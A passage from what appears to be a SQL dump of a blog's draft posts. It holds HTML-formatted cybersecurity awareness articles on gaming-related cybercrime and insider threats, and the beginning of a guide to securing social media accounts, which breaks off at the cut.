control of characters and environments, pushing their targets to the edge—often leaking their personal details as part of the harassment. For younger players, this can lead to discomfort, mental health challenges, or, worse, leaving them vulnerable to predatory actions.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hacking and Exploiting Weaknesses</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals thrive in digital spaces with insufficient security measures. By hacking into gaming servers or accounts, they can steal in-game assets or even use gaming servers to launch malicious programs like ransomware attacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Awareness and Action Are Urgently Needed</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The gaming industry\'s rapid growth has outpaced discussions around security. Parents and educators, in particular, need to realize the risks online gaming can pose. This is about more than harmless trolling—these practices have real-world consequences. Teen players being unwittingly drawn into criminal behaviors, from minor scams to major fraud, is a growing concern.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Can We Bolster Security in Online Gaming?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Implement Stricter Gaming Regulations</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Governments and gaming corporations need to work together to enforce transparency and safety policies. Requirements related to data protection, user behavior monitoring, and secure user verification could go a long way in mitigating risks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Educating Parents and Educators</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parents and teachers play a critical role in ensuring gaming remains safe and enjoyable. Monitoring screen time, initiating open conversations about online risks, and helping children recognize predatory behaviors can make all the difference.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Advocating for Better Built-in Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaming developers must take security as seriously as gameplay and graphics. Key features like two-factor authentication should become standard, while regular bug scans should ensure platforms remain hard targets for cyberattacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Growing Call to Action</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual worlds should be fun, interactive, and safe—but the harsh reality is that, without better safeguards in place, these environments pose risks no parent, gamer, or educator can afford to overlook. By advocating for stronger protections and increasing discussions around cybersecurity, we can help gaming evolve into a more secure space for everyone.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re a parent, educator, gamer, or even a cybersecurity advocate, now is the time to act. Learn about the hidden risks woven into online gaming platforms and stay informed so you can advocate for smarter, safer virtual worlds. Only then can we truly unlock gaming\'s potential—without compromising its integrity.</p>', '', NULL, NULL, 1, 'draft', '2025-02-10 21:34:04', '2026-01-12 21:41:44', 'CyberKids', 'The Dark Side of Gaming: How Virtual Worlds Are Fuels for Cybercrime', '', NULL),
(45, 'How to Protect Your Business from Insider Threats', 'how-to-protect-your-business-from-insider-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats pose a serious, often underestimated risk to businesses of all sizes. These security challenges come not from hackers or external attackers, but from individuals inside the organization. These might include employees, contractors, or business partners who have access to the company’s systems, data, or infrastructure. For IT security experts, cybersecurity learners, and small business owners, addressing insider threats is critical to safeguarding sensitive data, intellectual property, and overall business operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article provides strategies and actionable insights into understanding, identifying, and mitigating insider threats. Whether you\'re a seasoned IT professional or a small business owner looking to strengthen your defenses, the points outlined below will help you take a proactive approach.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Insider Threats</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Types of Insider Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Recognizing the different forms insider threats can take is the first step toward prevention:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malicious Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These are employees or partners with malicious intent who exploit their access to harm the organization, often for personal gain or external influence.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Negligent Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employees who unintentionally cause security breaches due to carelessness or lack of knowledge, such as clicking on phishing links or mishandling sensitive data.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Compromised Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When external attackers gain access to systems by manipulating or deceiving an internal employee (e.g., via phishing or social engineering).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Indicators of Insider Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s crucial to detect the warning signs of potential insider threats early. Common indicators include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Behavioral changes, such as disgruntled or secretive attitudes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Unusual data access patterns or large, unauthorized transfers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Employees holding excessive or unnecessary access privileges.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying Risks</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerable Areas</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats often center around specific business vulnerabilities, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Intellectual Property and Sensitive Data</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Proprietary information, trade secrets, and customer databases are prime targets.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network and System Access</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaining direct access to your organization’s network can lead to wide-reaching damage.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Scenarios</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding common threat scenarios can help businesses craft better mitigation strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Theft by Departing Employees</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employees leaving the company might take sensitive data with them, either knowingly or accidentally.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Privilege Abuse by IT Staff</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT professionals are often given high levels of system access, which can be misused if not properly managed.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Risk Assessment</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To identify potential risks, businesses should:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Conduct regular audits of both cybersecurity measures and access logs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Determine which assets are critical and require the most robust protection.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Prevention Strategies</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Access Control and Privilege Management</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing strict access controls ensures that employees only have permissions necessary to perform their jobs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Least Privilege Principles</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Restrict employee access to only what is essential for their role.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Regularly Review User Access</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reassess privileges periodically, especially for employees who change roles or departments.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Employee Education and Training</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your employees are your first line of defense against insider threats. Effective education includes:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hosting <b><strong class=\"font-bold\">cybersecurity awareness sessions</strong></b> to teach employees how to recognize phishing attacks and other social engineering tactics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Fostering a <b><strong class=\"font-bold\">culture of accountability</strong></b>, where employees understand their role in maintaining security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Monitoring and Detection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technological solutions can add an extra layer of oversight:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Security Information and Event Management (SIEM)</strong></b> tools to track and detect unusual behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Introducing <b><strong class=\"font-bold\">User Behavior Analytics (UBA)</strong></b> to identify patterns or anomalies that could indicate a threat.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Incident Response</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Developing an Insider Threat Response Plan</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even with prevention strategies in place, incidents may still occur. A defined insider threat response plan should include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Immediate steps to contain the threat and limit damage.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Clear roles and responsibilities for your Incident Response Team (IRT).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Post-Incident Analysis</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After resolving an incident, conduct a thorough post-mortem analysis:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify weaknesses in your policies or systems that allowed the threat to occur.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use findings to update processes and improve overall security measures.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Legal and Ethical Considerations</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Balancing Security and Privacy</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s critical to ensure that security measures respect employee privacy while complying with relevant data protection laws:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Transparent Policies</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outline how employee activity is monitored and how such data is stored and used.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Compliance with Laws</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure processes align with regulations such as GDPR, CCPA, and other privacy laws.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Engaging Legal Teams</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Proactively involve your legal team to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Draft contracts and policies that outline repercussions for insider threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ensure legal coverage in the event of a malicious insider incident.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools and Technologies for Insider Threat Management</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technology has become an essential part of insider threat management. Popular tools include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">SIEM Solutions</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like Splunk and LogRhythm to detect real-time anomalies.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Loss Prevention (DLP) Systems</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect sensitive data from leaving network environments.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Endpoint Detection and Response (EDR) Tools</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Solutions such as CrowdStrike and Carbon Black for monitoring endpoint activity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats are a reality for businesses across industries, but they don’t have to be a liability if addressed proactively. By understanding the nature of insider threats, reducing risks, and implementing robust prevention strategies, businesses can protect their assets, operations, and reputations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Take Action Today:</strong></b> Don’t wait for an incident to assess your insider threat strategy. Start implementing these best practices now to strengthen your defenses and create a culture of awareness and accountability. Remember, staying ahead of potential threats is a continuous process—adaptation and vigilance are key.</p>', '', NULL, NULL, 1, 'draft', '2025-02-10 21:22:34', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Business from Insider Threats', '', NULL),
(46, 'Tips for Keeping Your Social Media Accounts Secure', 'tips-for-keeping-your-social-media-accounts-secure', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms have become an integral part of both our personal and professional lives. From sharing daily updates to building brand recognition, these platforms offer incredible opportunities. However, they also come with significant risks. For IT security experts and cybersecurity learners, safeguarding social media accounts is not just crucial; it’s essential. Whether you\'re a business protecting sensitive data or an individual with a large following, taking proactive steps to secure your accounts can prevent costly breaches. Here’s a detailed guide to help you keep your social media accounts secure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Securing Social Media Accounts Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media accounts are more than just communication tools; they are gateways to personal data, professional files, and sometimes, customer information. Imagine a hacker gaining access to an influencer\'s account with millions of followers or a company’s Twitter handle. These breaches often lead to brand reputation damage, data theft, and financial loss.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">For professionals and businesses, ensuring social media security also means safeguarding proprietary data and preventing unauthorized access that could disrupt operations. By taking the right precautions upfront, you can minimize vulnerabilities and build a strong foundation for account security.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Security Threats on Social Media</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To effectively protect social media accounts, it\'s crucial to understand the common threats they face. Some of the most significant include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Phishing Scams</strong></b>: Sophisticated hackers often send emails or messages designed to trick users into giving away login credentials. These messages typically mimic legitimate notifications from the social platform.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Unauthorized Access</strong></b>: Weak passwords and lack of two-factor authentication make it easier for attackers to break into accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Malware Links</strong></b>: Cybercriminals use malicious links or attachments to compromise devices and steal account information.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Social Engineering Attacks</strong></b>: Through deceptive interactions, attackers manipulate individuals into 